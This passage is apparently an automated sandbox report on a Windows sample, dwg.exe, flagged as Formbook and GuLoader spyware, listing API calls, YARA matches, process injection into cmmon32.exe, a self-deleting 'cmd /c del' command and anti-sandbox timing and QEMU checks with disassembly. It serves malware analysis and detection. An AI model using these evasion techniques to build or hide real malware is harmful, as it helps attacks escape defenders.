      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1495F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149A10 NtQuerySection,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1498A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1499D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00565C93 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00566233 LoadLibraryA,NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00566448 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056646C NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005664C8 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056655C NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056623A NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005662DC NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056628E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005662B4 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_0056635A NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00566304 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005663FD NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00566380 NtSetInformationThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045095D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045096D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045096E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045099A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509560 NtWriteFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045095F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045097A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045098F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045098A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045099D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378290 NtReadFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378310 NtClose,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023783C0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023781E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378235 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237828A NtReadFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237830B NtClose,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237819A NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023781DC NtCreateFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CD616
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E126E30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D2EF7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D1FF1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11841F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CD466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D2D07
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E100D20
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D1D55
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D25DD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D22AE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D2B28
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13EBB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CDBD2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1002
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11B090
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1320A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D20A8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D28EC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10F900
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E124120
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458D466
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D841F
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04591D55
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04592D07
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C0D20
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045925DD
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DD5E0
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2581
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458D616
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E6E30
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04592EF7
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459DFCE
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04591FF1
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04581002
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0459E824
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045928EC
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044DB090
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045920A8
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CF900
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045922AE
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04592B28
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045803DA
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458DBD2
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FEBB0
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237C73F
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02362FB0
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237C7B8
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02368C70
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02368C6C
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02362D90
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02362D88
      Source: C:\Users\user\Desktop\dwg.exeCode function: String function: 1E10B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 044CB150 appears 35 times
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe, 00000000.00000000.194437867.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exe, 00000000.00000002.222283199.00000000020E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameradikalitete.exeFE2XNETVRKBOLSJ vs dwg.exe
      Source: dwg.exe, 00000000.00000002.222251197.00000000020A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs dwg.exe
      Source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs dwg.exe
      Source: dwg.exe, 00000004.00000000.220845134.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exe, 00000004.00000002.297131213.000000001E38F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs dwg.exe
      Source: dwg.exe, 00000004.00000002.296365706.000000001DC50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs dwg.exe
      Source: dwg.exeBinary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@13/8
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
      Source: C:\Users\user\Desktop\dwg.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2F905925E4C61327.TMPJump to behavior
      Source: dwg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\dwg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: dwg.exeReversingLabs: Detection: 17%
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: Binary string: cmmon32.pdb source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: cmmon32.pdbGCTL source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000004.00000002.296549952.000000001E0E0000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.463015429.00000000045BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, cmmon32.exe

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 6408, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 6408, type: MEMORY
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_004092D0 pushad ; retf
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E15D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00563E67 push cs; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0451D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237533F push FFFFFF96h; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0236C32F push es; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237B3D5 push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237583D push 0000003Fh; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237CE0D push ss; retf
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0236CF58 push ecx; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237B422 push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237B42B push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237B48C push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02375CD9 push C872E20Ah; retf
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02375D64 push edx; ret
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E07DA CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1E0E
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0A0C CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E082E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1870 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0668 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2E68 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0A8E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0884 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1E84
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2EB3
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2EAB
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2ECE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E08C2 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E06F6 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1D02
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E093A CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E072E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0921 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2F52
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0772 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0996 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1DAE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1DA9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E07A7 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E21D6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562154 TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005620CA TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005621D6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562180 TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_005621A2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562ECE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562EB3
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562EAB
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_00562F52
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E029E second address: 00000000021E029E instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E307B second address: 00000000021E307B instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E3204 second address: 00000000021E3204 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E09D2 second address: 00000000021E09D2 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000005632DC second address: 00000000005632DC instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000561EC6 second address: 0000000000561EC6 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000562170 second address: 0000000000562170 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: dwg.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E029E second address: 00000000021E029E instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E307B second address: 00000000021E307B instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E3204 second address: 00000000021E3204 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E639F second address: 00000000021E639F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor dword ptr [eax], edx 0x0000000d add eax, 04h 0x00000010 cmp eax, ebx 0x00000012 jne 00007F95DCE5AF6Ch 0x00000014 jmp 00007F95DCE5AFBEh 0x00000016 pushad 0x00000017 lfence 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021E09D2 second address: 00000000021E09D2 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 000000000056639F second address: 000000000056639F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor dword ptr [eax], edx 0x0000000d add eax, 04h 0x00000010 cmp eax, ebx 0x00000012 jne 00007F95DCE5AF6Ch 0x00000014 jmp 00007F95DCE5AFBEh 0x00000016 pushad 0x00000017 lfence 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000005632DC second address: 00000000005632DC instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000561EC6 second address: 0000000000561EC6 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000562170 second address: 0000000000562170 instructions:
      Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000023685F4 second address: 00000000023685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
